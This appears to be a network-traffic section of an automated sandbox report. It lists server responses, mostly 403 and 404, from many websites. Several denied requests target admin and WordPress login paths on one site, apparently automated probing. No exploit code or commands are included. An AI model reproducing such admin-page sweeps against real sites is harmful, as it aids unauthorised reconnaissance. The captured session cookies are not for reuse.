                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 05 Feb 2024 11:14:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 05 Feb 2024 11:14:05 GMTContent-Length: 1245
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 05 Feb 2024 11:14:05 GMTContent-Length: 1245
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 277Expires: Mon, 05 Feb 2024 11:14:50 GMTDate: Mon, 05 Feb 2024 11:14:50 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131690629_1611129006_213759684_14_8770_102_0_-";dur=1Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;administrator&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131690&#46;cbdb6c4</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:05 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bosBlvmz7%2FxBQMu7rQ0ihtXGjC718i6u7IWII4cL%2FyHhNG2lxGf1AlBQmsK9CBd3GCoim8Syq8Rhc8XzqZx24f%2BT9rYBbgTKZnjdFs2UEFi7Cdi2Wxr9uJuNXgPWS2bY7w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abb6a6b5212da-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:05 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yVFSkXJDufHa9cqYPTBtGG2iX4EnLYKXpy%2FFcnsTEp3Q8bWWhnHe4FROoNiqVwnUAi50%2FtFeMHDmyJx7TbQY1Nw8Efg3TIRD5vMmtH1aHudBXRPU%2FtKx%2FusHTAzIW%2B76Uw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abb6bcc0112da-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Set-Cookie: osCsid=043e21066f59341f79d55d583419ce99; expires=Mon, 04 Mar 2024 11:14:50 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: osCsid=043e21066f59341f79d55d583419ce99; expires=Mon, 04 Mar 2024 11:14:50 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=Nonex-imvu-rnd: b3ImgELbU2l0Yu6aF3Xcontent-language: pt-brContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 290Expires: Mon, 05 Feb 2024 11:14:50 GMTDate: Mon, 05 Feb 2024 11:14:50 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131690957_1611129006_213759812_14_9815_102_0_-";dur=1 Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;administrator&#47;index&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131690&#46;cbdb744</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveContent-Encoding: gzipContent-Type: text/htmlDate: Mon, 05 Feb 2024 11:14:50 GMTEtag: W/"61128294-3feb"Logid: 8900799505880304556P3p: CP=" OTI DSP COR IVA OUR IND COM "Server: nginxSet-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;Set-Cookie: BAIDUID=1B2A58FE47332A09C358E035BAC35AD0:FG=1; expires=Tue, 04-Feb-25 11:14:50 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1Vary: Accept-EncodingVary: Accept-EncodingX-Powered-By: BaiduCloudYld: 8900799505880304556Yme: ZIGW/y8rX0QMaTYYTmvhrm5XvfwASwfzoAJPwiY=Transfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cachex-imvu-rnd: QVzQdd5i06Z7LhzBcontent-language: pt-brContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:06 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kUQx2bPKD6Q8B4mYJoXNgGMvD%2BUbPboVXzm3qK2TBYFIUSGoPxAn5ItW7xWZ7V2E98vveF%2FVqnmdSwHs2ftsFer1TrJAPLP8tJyP3LESiunzVp%2BSrBzR1ZT4CRmCnjyI9p%2BxDNgO04YG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abb6eab8c0725-ATLContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Date: Mon, 05 Feb 2024 11:14:51 GMTContent-Length: 1245
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 05 Feb 2024 11:14:07 GMTContent-Length: 1245
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:52 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Thu, 06 Oct 2022 20:52:18 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:07 GMTSet-Cookie: __cf_bm=C0okAsbog8HQOim82y8A0dtxa1TT2rXKEdpWRiS_Ncw-1707131692-1-AaCCF5wKz+RTseBMX6wyhxHWfFimdvblL3mBq8A5FlJsBiX/igET6K6Q9HB7wJj2EkwqNISYdZqVV4o65q1emC8=; path=/; expires=Mon, 05-Feb-24 11:44:52 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=NoneVary: Accept-EncodingServer: cloudflareCF-RAY: 850abb73aefb1357-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 279Expires: Mon, 05 Feb 2024 11:14:52 GMTDate: Mon, 05 Feb 2024 11:14:52 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131692179_1611129006_213760295_11_8707_0_0_-";dur=1 Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;wp&#45;login&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131692&#46;cbdb927</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:07 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BhAGiaxVKVO%2FWM0P0dvf67Exyiv0%2Fsc%2BreFc2Rw9417O5wwrVWr8h6F%2BHuGVGAQcOTJjqUvh5ZtWLvjvOgY5xv0QnK6GitDB5vUDB9Rsq%2F1TqxsFxyoYFxbBHnBV3vVVdA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abb74fa3c12d3-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 276Expires: Mon, 05 Feb 2024 11:14:52 GMTDate: Mon, 05 Feb 2024 11:14:52 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131692451_1611129006_213760407_15_10881_106_0_-";dur=1 Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;wp&#45;admin&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131692&#46;cbdb997</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:07 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rnHUskwPaTak3RTPHyRhhoWMf8E7rS6yw0kRm6829YQyRTYm9KQeQ1tmAj%2BNlN9t9rc0GLcTTzHs%2F%2BxjvvnYDNXPDSEbDAA1WvXswTBApw3%2FfZRwtHcUvinf6%2BszZf5QVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abb75da9112d3-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 850abb7598c8457b-ATLContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:07 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uHBJFymD2utvH5IoFxvviVDfMMjs%2BO4VuuRlw3LrJiumvQ2ulG0O4bVONnpEC%2FfkkNSfuaiOQJUaev7pEHWA%2BD30J%2F3hfn8884xXOGWzVNJAkGD8nazHUXMN7A4Dlkh5DQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abb77098ab129-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:52 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9X-Powered-By: PHP/5.4.16Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 38 0d 0a 3c 68 31 3e 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 18<h1>404: Not Found</h1>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Date: Mon, 05 Feb 2024 11:14:51 GMTContent-Length: 1245
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Date: Mon, 05 Feb 2024 11:14:53 GMTContent-Length: 1245
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Thu, 06 Oct 2022 20:52:18 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:08 GMTSet-Cookie: __cf_bm=HTdhiFEHQ5RGQCcLrcRtNpgnvzRyndeZpTAuCOlwX6w-1707131693-1-AbCaMLIjDqngVMcGLilAlUXwWsRi7mqIuPYzF0jb7+CWUPLUIhQswNu9gDr78WVmD54g64fXmrtQsks4sMe1hg8=; path=/; expires=Mon, 05-Feb-24 11:44:53 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=NoneVary: Accept-EncodingServer: cloudflareCF-RAY: 850abb7a5cd51d6a-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Thu, 06 Oct 2022 20:52:18 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Set-Cookie: osCsid=b2f63ea48e4bfb77f14e9d7cdffaf9b7; expires=Mon, 04 Mar 2024 11:14:53 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: osCsid=b2f63ea48e4bfb77f14e9d7cdffaf9b7; expires=Mon, 04 Mar 2024 11:14:53 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=Nonex-imvu-rnd: aw0ZU7Wx77VPHv6content-language: pt-brContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveContent-Encoding: gzipContent-Type: text/htmlDate: Mon, 05 Feb 2024 11:14:53 GMTEtag: W/"62650964-3feb"Logid: 8900800306063491885P3p: CP=" OTI DSP COR IVA OUR IND COM "Server: nginxSet-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;Set-Cookie: BAIDUID=A87D8840E6ACB4C43FA6725E63D037D4:FG=1; expires=Tue, 04-Feb-25 11:14:53 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1Vary: Accept-EncodingVary: Accept-EncodingX-Powered-By: BaiduCloudYld: 8900800306063491885Yme: ZIGW/y8rX0gMaTUAUmr/tG1LteUfTQTrqQhFwSCAkA==Transfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveContent-Encoding: gzipContent-Type: text/htmlDate: Mon, 05 Feb 2024 11:14:53 GMTEtag: W/"62650964-3feb"Logid: 8900800306063491885P3p: CP=" OTI DSP COR IVA OUR IND COM "Server: nginxSet-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;Set-Cookie: BAIDUID=A87D8840E6ACB4C43FA6725E63D037D4:FG=1; expires=Tue, 04-Feb-25 11:14:53 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1Vary: Accept-EncodingVary: Accept-EncodingX-Powered-By: BaiduCloudYld: 8900800306063491885Yme: ZIGW/y8rX0gMaTUAUmr/tG1LteUfTQTrqQhFwSCAkA==Transfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Set-Cookie: osCsid=3d56c00b3a8b97318c69b3bcd402d268; expires=Mon, 04 Mar 2024 11:14:54 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: osCsid=3d56c00b3a8b97318c69b3bcd402d268; expires=Mon, 04 Mar 2024 11:14:54 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=Nonex-imvu-rnd: DL5kI03G4GbOn9bDoAu5aSI5S6j7XuUcontent-language: pt-brContent-Encoding: gzip
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                    Content-Type: text/html
                    Server: Microsoft-IIS/10.0
                    Date: Mon, 05 Feb 2024 11:14:13 GMT
                    Content-Length: 1245
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 05 Feb 2024 11:15:01 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    x-zone: 3-ded6941-web19
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 850abbab1dcd6735-ATL
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 403 Forbidden
                    Server: AkamaiGHost
                    Mime-Version: 1.0
                    Content-Type: text/html
                    Content-Length: 272
                    Expires: Mon, 05 Feb 2024 11:15:07 GMT
                    Date: Mon, 05 Feb 2024 11:15:07 GMT
                    Connection: close
                    Server-Timing: cdn-cache; desc=HIT
                    Server-Timing: edge; dur=1
                    Server-Timing: ak_p; desc="1707131707977_1611129006_213767433_15_9066_0_0_-";dur=1
                    Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131707&#46;cbdd509</BODY></HTML>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 403 Forbidden
                    Date: Mon, 05 Feb 2024 11:15:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Frame-Options: SAMEORIGIN
                    Referrer-Policy: same-origin
                    Cache-Control: max-age=15
                    Expires: Mon, 05 Feb 2024 11:15:22 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z68UVnYT7amvJkaV8QNmUHQPrE1kIjwMRyjpK57PoYQIZDBEOk6aP7jTmidpCO9l49IgIUG874l1SI3D0qM6UgRVocG8VJc6N33PRsHkyHZnLk65sxCbre7aVKjL8CHamQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Vary: Accept-Encoding
                    Server: cloudflare
                    CF-RAY: 850abbd6df6c0723-ATL
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                    Content-Type: text/html
                    Server: Microsoft-IIS/7.0
                    X-Powered-By: ASP.NET
                    Access-Control-Allow-Origin: *
                    Date: Mon, 05 Feb 2024 11:15:14 GMT
                    Content-Length: 1245
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 503 Service Unavailable
                    Retry-After: 5
                    Content-Type: text/html
                    Cache-Control: no-cache, no-store
                    Connection: close
                    X-Iinfo: 18-7271493-0 NNNN RT(1707131707144 2) q(0 0 -1 -1) r(150 -1) b6 U5
                    Set-Cookie: visid_incap_2490076=kLeaQSZ1RB6mANP3fttPzErDwGUAAAAAQUIPAAAAAAC8rGzozAqaKHOHbzumengl; expires=Mon, 03 Feb 2025 22:24:35 GMT; HttpOnly; path=/; Domain=.vodafone.de
                    Set-Cookie: incap_ses_9117_2490076=tGTdAjvxwnSj8Hr7LxiGfkrDwGUAAAAAgu2NC6fgHpmbmxBlXbXLHw==; path=/; Domain=.vodafone.de
                    X-CDN: Imperva
                    Content-Encoding: gzip
                    Transfer-Encoding: chunked
                    X-Iinfo: 13-6888818-6889272 nNYN RT(1707131705768 2156) q(0 0 0 -1) r(150 150) b6 U22
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 403 Forbidden
                    Date: Mon, 05 Feb 2024 11:16:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Frame-Options: SAMEORIGIN
                    Referrer-Policy: same-origin
                    Cache-Control: max-age=15
                    Expires: Mon, 05 Feb 2024 11:16:21 GMT
                    Vary: Accept-Encoding
                    Server: cloudflare
                    CF-RAY: 850abd42fdef673d-ATL
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 403 Forbidden
                    Date: Mon, 05 Feb 2024 11:16:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Frame-Options: SAMEORIGIN
                    Referrer-Policy: same-origin
                    Cache-Control: max-age=15
                    Expires: Mon, 05 Feb 2024 11:16:21 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qK9PNyzwXathFv3E3jUcK4mRbmY5M9WqFnyeUWG0aNUl9ki6VC%2BBp6ajRMQUMjslVYpXWxl%2BjxOE%2BM1sbJbsmOdiYF9Qwnq%2BlTV9ZqfNTzGVrCDKICObICLlzVJMXTQ%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                    Vary: Accept-Encoding
                    Server: cloudflare
                    CF-RAY: 850abd435c484527-ATL
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                    Access-Control-Allow-Origin: *
                    Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                    Access-Control-Max-Age: 86400
                    Connection: close
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 05 Feb 2024 11:16:06 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Vary: Accept-Encoding
                    Server: nginx/1.17.9
                    X-Powered-By: PHP/8.2.4
                    Set-Cookie: osCsid=005c033de8762365d836e38a023bc42d; expires=Mon, 04 Mar 2024 11:16:06 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                    Pragma: no-cache
                    Set-Cookie: osCsid=005c033de8762365d836e38a023bc42d; expires=Mon, 04 Mar 2024 11:16:06 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                    x-imvu-rnd: ar391KuAO98H7mqEEDsFG14oxg
                    content-language: pt-br
                    Content-Encoding: gzip
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 05 Feb 2024 11:16:06 GMT
                    Server: Apache
                    Upgrade: h2,h2c
                    Connection: Upgrade
                    Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                    Accept-Ranges: bytes
                    Vary: Accept-Encoding
                    Content-Encoding: gzip
                    Content-Length: 836
                    Content-Type: text/html
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 403 Forbidden
                    Server: AkamaiGHost
                    Mime-Version: 1.0
                    Content-Type: text/html
                    Content-Length: 264
                    Expires: Mon, 05 Feb 2024 11:16:06 GMT
                    Date: Mon, 05 Feb 2024 11:16:06 GMT
                    Connection: close
                    Server-Timing: cdn-cache; desc=HIT
                    Server-Timing: edge; dur=1
                    Server-Timing: ak_p; desc="1707131766676_1611129006_213793506_17_10936_164_0_-";dur=1
                    Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131766&#46;cbe3ae2</BODY></HTML>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 05 Feb 2024 11:16:06 GMT
                    Server: Apache
                    Upgrade: h2,h2c
                    Connection: Upgrade
                    Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                    Accept-Ranges: bytes
                    Vary: Accept-Encoding
                    Content-Encoding: gzip
                    Content-Length: 836
                    Content-Type: text/html
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 403 Forbidden
                    Date: Mon, 05 Feb 2024 11:16:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Frame-Options: SAMEORIGIN
                    Referrer-Policy: same-origin
                    Cache-Control: max-age=15
                    Expires: Mon, 05 Feb 2024 11:16:21 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QvqQ%2FxEnrKR%2F%2BHzb84b6z880W8GyLqGxyi9d8my5iJhBBTbUbwZqNJN7On7QmOmSULYli1fOqVR%2BlQuwt1Y1GuxPOiRNgLhEJ5WpVOMaoq%2FdWaneF%2BE7i213GKAYumaUCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
